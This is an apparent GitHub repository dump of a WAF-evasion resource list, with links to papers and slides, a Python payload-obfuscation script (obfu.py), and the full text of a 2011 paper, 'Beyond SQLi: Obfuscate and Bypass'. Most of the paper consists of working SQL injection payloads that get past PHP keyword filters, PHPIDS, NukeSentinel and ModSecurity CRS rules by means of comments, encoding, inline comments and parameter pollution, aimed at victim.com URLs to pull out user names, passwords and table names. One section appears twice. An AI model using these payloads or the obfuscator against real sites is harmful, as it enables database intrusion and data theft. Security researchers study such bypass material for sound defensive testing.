├── images
│   ├── how-wafs-work.png
│   ├── waf-general-arch.png
│   └── character-interpretations.png
├── papers
│   ├── Poking A Hole In The Firewall.pdf
│   ├── WASC WAF Evaluation Criteria.pdf
│   ├── SANS Guide - WAF Evasion Testing.pdf
│   ├── Bypassing WAF XSS Detection Mechanisms.pdf
│   ├── Qualys Guide - Protocol-Level WAF Evasion.pdf
│   ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf
│   ├── Evading All Web-Application Firewalls XSS Filters.pdf
│   ├── Web Application Firewalls - Evaluation and Analysis.pdf
│   ├── Artificial Neural Network based WAF for SQL Injection.pdf
│   ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf
│   ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf
│   └── Beyond SQLi - Obfuscate and Bypass WAFs.txt
├── presentations
│   ├── Playing Around with WAFs.pdf
│   ├── OWASP WAF Profiling & Evasion.pdf
│   ├── A Forgotten HTTP Invisibility Cloak.pdf
│   ├── WAF Bypasses and PHP Exploits (Slides).pdf
│   ├── Methods To Bypass A Web Application Firewall.pdf
│   ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf
│   ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf
│   ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf
│   ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf
│   ├── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf
│   └── Building Your Own WAF as a Service and Forgetting about False Positives.pdf
├── others
│   ├── README.md
│   └── obfu.py
├── LICENSE
├── .gitignore
├── contributing.md
└── code-of-conduct.md

/images/how-wafs-work.png:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/how-wafs-work.png

/images/waf-general-arch.png:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/waf-general-arch.png
/images/character-interpretations.png:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/character-interpretations.png

/papers/Poking A Hole In The Firewall.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Poking A Hole In The Firewall.pdf

/papers/WASC WAF Evaluation Criteria.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/WASC WAF Evaluation Criteria.pdf

/papers/SANS Guide - WAF Evasion Testing.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/SANS Guide - WAF Evasion Testing.pdf

/presentations/Playing Around with WAFs.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Playing Around with WAFs.pdf

/presentations/OWASP WAF Profiling & Evasion.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/OWASP WAF Profiling & Evasion.pdf
/papers/Bypassing WAF XSS Detection Mechanisms.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Bypassing WAF XSS Detection Mechanisms.pdf

/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf

/presentations/A Forgotten HTTP Invisibility Cloak.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/A Forgotten HTTP Invisibility Cloak.pdf

/presentations/WAF Bypasses and PHP Exploits (Slides).pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/WAF Bypasses and PHP Exploits (Slides).pdf

/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf

/papers/Evading All Web-Application Firewalls XSS Filters.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Evading All Web-Application Firewalls XSS Filters.pdf

/papers/Web Application Firewalls - Evaluation and Analysis.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Web Application Firewalls - Evaluation and Analysis.pdf

/presentations/Methods To Bypass A Web Application Firewall.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Methods To Bypass A Web Application Firewall.pdf

/papers/Artificial Neural Network based WAF for SQL Injection.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Artificial Neural Network based WAF for SQL Injection.pdf

/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf

/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf
/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf

/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf

/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf

/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf

/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf
/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf:
https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf

/others/README.md:

## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py)
> A small script to encode and obfuscate your payloads easily to your desired encodings.

### Usage:
```
$ python obfu.py -h

OBFUSCATOR

usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi]

Required Arguments:
  -s STR, --str STR  String to obfuscate
  -e ENC, --enc ENC  Encoding type. eg: ibm037, utf16, etc

Optional Arguments:
  -ueo               URL Encode Output
  -udi               URL Decode Input
```
### Example Usage:
```
$ python3 obfu.py -s 'param=
```

/contributing.md:

``` shell
git checkout -b my-new-feature master
git commit -a
git push origin my-new-feature
```

### Staying In Sync With Upstream

When your branch gets out of sync with the paulveillard/master branch, use the following to update:

``` shell
git checkout my-new-feature
git fetch -a
git pull --rebase upstream master
git push --force-with-lease origin my-new-feature
```

### Updating pull requests

If your PR fails to pass CI or needs changes based on code review, you'll most likely want to squash these changes into existing commits.

If your pull request contains a single commit or your changes are related to the most recent commit, you can simply amend the commit.
``` shell
git add .
git commit --amend
git push --force-with-lease origin my-new-feature
```

If you need to squash changes into an earlier commit, you can use:

``` shell
git add .
git commit --fixup <commit>
git rebase -i --autosquash master
git push --force-with-lease origin my-new-feature
```

Be sure to add a comment to the PR indicating your new changes are ready to review, as GitHub does not generate a notification when you git push.

### Code Style

### Formatting Commit Messages

We follow the conventions on [How to Write a Git Commit Message](http://chris.beams.io/posts/git-commit/).

Be sure to include any related GitHub issue references in the commit message. See [GFM syntax](https://guides.github.com/features/mastering-markdown/#GitHub-flavored-markdown) for referencing issues and commits.

## Reporting Bugs and Creating Issues

When opening a new issue, try to roughly follow the commit message format conventions above.
/others/obfu.py:

```python
# Modified from @irsdl's script
import sys
import urllib.parse
from argparse import ArgumentParser

lackofart = '''
OBFUSCATOR
'''


def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False,
                urlDecodeInput=True, urlEncodeOutput=True):
    """Re-encode `params` in `charset` (e.g. ibm037, utf16).

    Every piece is optionally URL-decoded first, then encoded with `charset`,
    then optionally URL-encoded again. Returns a str when urlEncodeOutput is
    set and raw bytes otherwise, so str and bytes are never concatenated.
    """

    def encode(text):
        if urlDecodeInput:
            text = urllib.parse.unquote(text)
        data = text.encode(charset)
        return urllib.parse.quote_plus(data) if urlEncodeOutput else data

    # Literal separators keep the same type as encode() returns; they are
    # re-encoded in `charset` only when explicitly requested.
    def separator(char, encodeIt):
        if encodeIt:
            return encode(char)
        return char if urlEncodeOutput else char.encode("ascii")

    # Treat the input as name=value pairs only when both separators are present.
    # (The original test `'=' and '&' in params` only ever checked for '&'.)
    if "=" in params and "&" in params:
        equalSign = separator("=", encodeEqualSign)
        ampersand = separator("&", encodeAmpersand)
        pairs = []
        for param_pair in params.split("&"):
            # Split on the first '=' only, so values containing '=' survive.
            param, _, value = param_pair.partition("=")
            pairs.append(encode(param) + equalSign + encode(value))
        return ampersand.join(pairs)
    return encode(params)


def main():
    print(lackofart)
    parser = ArgumentParser('python3 obfu.py')
    parser._action_groups.pop()

    # A simple hack to list required arguments and optional arguments separately
    required = parser.add_argument_group('Required Arguments')
    optional = parser.add_argument_group('Optional Arguments')

    # Required options (enforced, so a missing -s or -e no longer crashes paramEncode)
    required.add_argument('-s', '--str', help='String to obfuscate', dest='str', required=True)
    required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc', required=True)

    # Optional arguments
    optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
    optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit()
    args = parser.parse_args()
    print('Input: %s' % (args.str))
    print('Output: %s' % (paramEncode(params=args.str, charset=args.enc,
                                      urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))


if __name__ == '__main__':
    main()
```

/code-of-conduct.md:

# Contributor Covenant Code of Conduct

## Our Pledge

We as members, contributors, and leaders pledge to make participation in the ansible-security-hardening project and our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation.

We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community.
## Our Standards

Examples of behavior that contributes to a positive environment for our community include:

* Demonstrating empathy and kindness toward other people
* Being respectful of differing opinions, viewpoints, and experiences
* Giving and gracefully accepting constructive feedback
* Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience
* Focusing on what is best not just for us as individuals, but for the overall community

Examples of unacceptable behavior include:

* The use of sexualized language or imagery, and sexual attention or advances of any kind
* Trolling, insulting or derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or email address, without their explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting

## Enforcement Responsibilities

Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful.

Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate.

## Scope

This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces.
Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at info@paulveillard.com. All complaints will be reviewed and investigated promptly and fairly.

All community leaders are obligated to respect the privacy and security of the reporter of any incident.

## Enforcement Guidelines

Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct:

### 1. Correction

**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community.

**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested.

### 2. Warning

**Community Impact**: A violation through a single incident or series of actions.

**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban.

### 3. Temporary Ban

**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior.
**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban.

### 4. Permanent Ban

**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals.

**Consequence**: A permanent ban from any sort of public interaction within the community.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 2.0, available at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.

Community Impact Guidelines were inspired by [Mozilla's code of conduct enforcement ladder](https://github.com/mozilla/diversity).

[homepage]: https://www.contributor-covenant.org

For answers to common questions about this code of conduct, see the FAQ at https://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations.
/papers/Beyond SQLi - Obfuscate and Bypass WAFs.txt:

|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|


######
 Info
######

Title  : Beyond SQLi: Obfuscate and Bypass
Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team   : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date   : 2011-10-06


##########
 Contents
##########

[0x00] - Introduction

[0x01] - Filter Evasion (MySQL)

   [0x01a] - Bypass Functions and Keywords Filtering
   [0x01b] - Bypass Regular Expression Filtering

[0x02] - Normally Bypassing Techniques

[0x03] - Advanced Bypassing Techniques

   [0x03a] - HTTP Parameter Pollution: Split and Join
   [0x03b] - HTTP Parameter Contamination

[0x04] - How to protect your website

[0x05] - Conclusion

[0x06] - References

[0x07] - Greetz To


#######################
[0x00] - Introduction
#######################

Welcome readers, this paper is a long attempt at documenting the advanced SQL injection techniques we have been working on.
This paper discloses advanced bypassing and obfuscation techniques, many of which can be used against real CMSs and WAFs. The SQL injection statements proposed in this paper are just some of the ways to bypass the protection.
There are still other techniques that can be used to attack web applications, but unfortunately we cannot tell you about them right now, as they are kept as 0-day attacks. However, this paper aims to show that there is no completely secure system in the real world, even if you spend more than 300,000 USD on a WAF.

This paper is divided into 7 sections, but only sections 0x01 to 0x03 contain technical information.

Section 0x01 gives details of how to bypass filters, including basic, function and keyword filtering.
Section 0x02 covers the common bypassing techniques for open-source and commercial WAFs.
Section 0x03 discusses in depth the advanced bypassing techniques, separated into 2 sections: "HTTP Parameter Contamination" and "HTTP Pollution: Split and Join".
Section 0x04 guides you to the right solution for protecting your own website.
The last, section 0x05, is the conclusion drawn from sections 0x01-0x04.


#################################
[0x01] - Filter Evasion (MySQL)
#################################

This section describes filter evasion behaviour based on PHP and MySQL and how to bypass the filtering. Filtering is a technique used to prevent SQL injection attacks; it is done with a black list of SQL functions and keywords, or with regular expressions.
This means that the protection relies heavily on how complete the black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL injection attacks.

+++++++++++++++++++++++++++++++++++++++++++++++++++
[0x01a] - Bypass Functions and Keywords Filtering
+++++++++++++++++++++++++++++++++++++++++++++++++++

Functions and keywords filtering prevents web applications from being attacked by using a black list of functions and keywords.
If an attacker submits injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful.
However, if the attacker is able to rewrite the injection using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a large number of keywords and functions has to be put into the black list. However, this affects users who want to submit input containing a word in the black list: they will be unable to submit it because it is filtered by the black list. The following scenarios show cases of using functions and keywords filtering and the techniques for bypassing it.


Keyword filter: and, or
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or)/i', $id)

The keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

Filtered injection: 1 or 1 = 1        1 and 1 = 1
Bypassed injection: 1 || 1 = 1        1 && 1 = 1
----------------------------------------------------------------------


Keyword filter: and, or, union
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union)/i', $id)

The keyword union is generally used to build a malicious statement that selects extra data from the database.

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

** Remark: you have to know the table name, column name and some data in the table; otherwise you have to get them from the information_schema.columns table using other statements,
e.g. using the substring function to get each character of the table names.
----------------------------------------------------------------------


Keyword filter: and, or, union, where
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by, select
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by, select, '
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by, select, ', hex
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by, select, ', hex, substr
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
----------------------------------------------------------------------


Keyword filter: and, or, union, where, limit, group by, select, ', hex, substr, white space
----------------------------------------------------------------------
PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)

----------------------------------------------------------------------


From the above examples, it can be seen that there are a number of SQL statements that can be used to bypass the black list, even though the black list contains many keywords and functions.
Furthermore, there are a huge number of SQL statements, not shown in the examples above, that can be used to bypass the black list.

Creating a bigger black list is not a good way to protect your own websites. Remember: the more keywords and functions you filter, the less user-friendly the application becomes.


+++++++++++++++++++++++++++++++++++++++++++++++
[0x01b] - Bypass Regular Expression Filtering
+++++++++++++++++++++++++++++++++++++++++++++++

Regular expression filtering is a better solution for preventing SQL injection than keyword and function filtering, because it uses pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server.
However, many regular expressions can also be bypassed. The following examples illustrate injection scripts used to bypass the regular expressions in the open-source PHPIDS 0.6.

PHPIDS generally blocks input containing = or ( or ' followed by any string or integer, e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain the =, ( or ' symbols.

[Code]---------------------------------------------------------------
Filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
[End Code]-----------------------------------------------------------

[Code]---------------------------------------------------------------
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
[End Code]-----------------------------------------------------------



########################################
[0x02] - Normally Bypassing Techniques
########################################

In this section we describe techniques for bypassing a Web Application Firewall (WAF). First, you need to know: what is a WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
WAFs are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service layers.

[Code]---------------------------------------------------------------
Filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
[End Code]-----------------------------------------------------------

[Code]---------------------------------------------------------------
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
[End Code]-----------------------------------------------------------



########################################
[0x02] - Normally Bypassing Techniques
########################################

In this section we describe techniques to bypass a Web Application Firewall (WAF). First, you need to know what a WAF is.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application,
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
WAFs are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service layers.
Some modern WAF systems work with both attack signatures and abnormal behavior.

Now let's rock and understand how to breach it with obfuscation. All WAFs can be bypassed given the time to understand their rules, or by using your imagination!!


1. Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
[End Code]-----------------------------------------------------------


2. Case Changing

Some WAFs filter only lowercase SQL keywords.

Regex Filter: /union\sselect/g

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
[End Code]-----------------------------------------------------------


3. Replaced Keywords

Some applications and WAFs use preg_replace to remove all SQL keywords, so we can bypass them easily.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
[End Code]-----------------------------------------------------------

In some cases the SQL keyword is filtered out and replaced with whitespace, so we can use "%0b" to bypass.

[Code]---------------------------------------------------------------
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
[End Code]-----------------------------------------------------------

With mod_rewrite, the comment "/**/" cannot be used to bypass, so we use "%0b" in place of "/**/".

Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html



4. Character Encoding

Most CMSs and WAFs decode and then filter application input, but some WAFs decode the input only once, so
double encoding can bypass certain filters: the WAF decodes the input once and then filters it, while the application keeps
decoding and the SQL statement executes.

[Code]-----------------------------------------------------------------------------------------------------------------
http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
[End Code]-------------------------------------------------------------------------------------------------------------

Moreover, these techniques can be combined to bypass Citrix Netscaler:
- Remove all "NULL" words
- Use query encoding in some parts
- Remove the single quote character "'"
- And have fun!!
Credit: Wendel Guglielmetti Henrique

"Armorlogic Profense" prior to 2.4.4 was bypassed by a URL-encoded newline character.


#Real World Example

1. NukeSentinel (Nuke Evolution)

[Nukesentinel.php Code]------------------------------------------------------------
// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
    if (stristr($nsnst_const['query_string'],'+union+') OR
        stristr($nsnst_const['query_string'],'%20union%20') OR
        stristr($nsnst_const['query_string'],'*/union/*') OR
        stristr($nsnst_const['query_string'],' union ') OR
        stristr($nsnst_const['query_string_base64'],'+union+') OR
        stristr($nsnst_const['query_string_base64'],'%20union%20') OR
        stristr($nsnst_const['query_string_base64'],'*/union/*') OR
        stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
        die("BLOCK IP 1 ");
    }
}
[End Code]-------------------------------------------------------------------------

We can bypass their filtering with these requests:

Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


2. Mod Security CRS (Credit: Johannes Dahse)

[SecRule]--------------------------------------------------------------------------
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
    "phase:2,rev:'2.2.1',capture,t:none,\
    t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,\
    msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',\
    tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',\
    setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\
    setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
[End Rule]-------------------------------------------------------------------------

We can bypass their filtering with this request:

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
[End Code]--------------------------------------------------------------------------

This request bypasses the Mod Security rule. Let's see what happens!!

MySQL Server supports 3 comment styles:
- From a "#" character to the end of the line
- From a "--" sequence to the end of the line
- From a /* sequence to the following */ sequence, as in the C programming language.
  This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
  not be on the same line.

In the example above we used "%0D%0A" as the newline characters. Let's take a look at the first request (to extract the DB user).
The resulting SQL payload looked something like this:

0 div 1 union#foo*/*/bar
select#foo
1,2,current_user

However the SQL payload, when executed by the MySQL DB, looked something like this:

0 div 1 union select 1,2,current_user


5. Buffer Overflow

WAFs written in the C language are prone to overflow, or act differently, when loaded with a bunch of data.
Giving them a large amount of data allows our code to execute.

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
[End Code]--------------------------------------------------------------------------


6. Inline Comments (MySQL Only)

From the MySQL 5.0 Reference Manual: MySQL Server supports some variants of C-style comments. These enable you to write
code that includes MySQL extensions, but is still portable, by using comments of the following form:

/*! MySQL-specific code */

In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
but other SQL servers will ignore the extensions.

A lot of WAFs filter SQL keywords with a pattern like /union\sselect/ig. We can bypass this filter by using inline comments.

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
[End Code]--------------------------------------------------------------------------

Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can
add more inline comments:

[Code]------------------------------------------------------------------------------
http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
[End Code]--------------------------------------------------------------------------



########################################
[0x03] - Advanced Bypassing Techniques
########################################

In this section we present two techniques, "HTTP Parameter Pollution: Split and Join" and "HTTP Parameter Contamination".
These techniques can bypass many open-source and commercial Web application firewalls (WAFs).


++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x03a] - HTTP Parameter Pollution: Split and Join
++++++++++++++++++++++++++++++++++++++++++++++++++++

HTTP Parameter Pollution (HPP) is a new class of injection vulnerability described by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
effective hacking technique. HPP attacks can be defined as the feasibility of overriding or adding HTTP GET/POST parameters by injecting into the
query string.

Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

HTTP Parameter Handling: (Example)

+-------------+------------------------------+-----------------+
| Web Server  | Parameter Interpretation     | Example         |
+-------------+------------------------------+-----------------+
| ASP.NET/IIS | Concatenation by comma       | par1=val1,val2  |
| ASP/IIS     | Concatenation by comma       | par1=val1,val2  |
| PHP/Apache  | The last param is resulting  | par1=val2       |
| JSP/Tomcat  | The first param is resulting | par1=val1       |
| Perl/Apache | The first param is resulting | par1=val1       |
| DBMan       | Concatenation by two tildes  | par1=val1~~val2 |
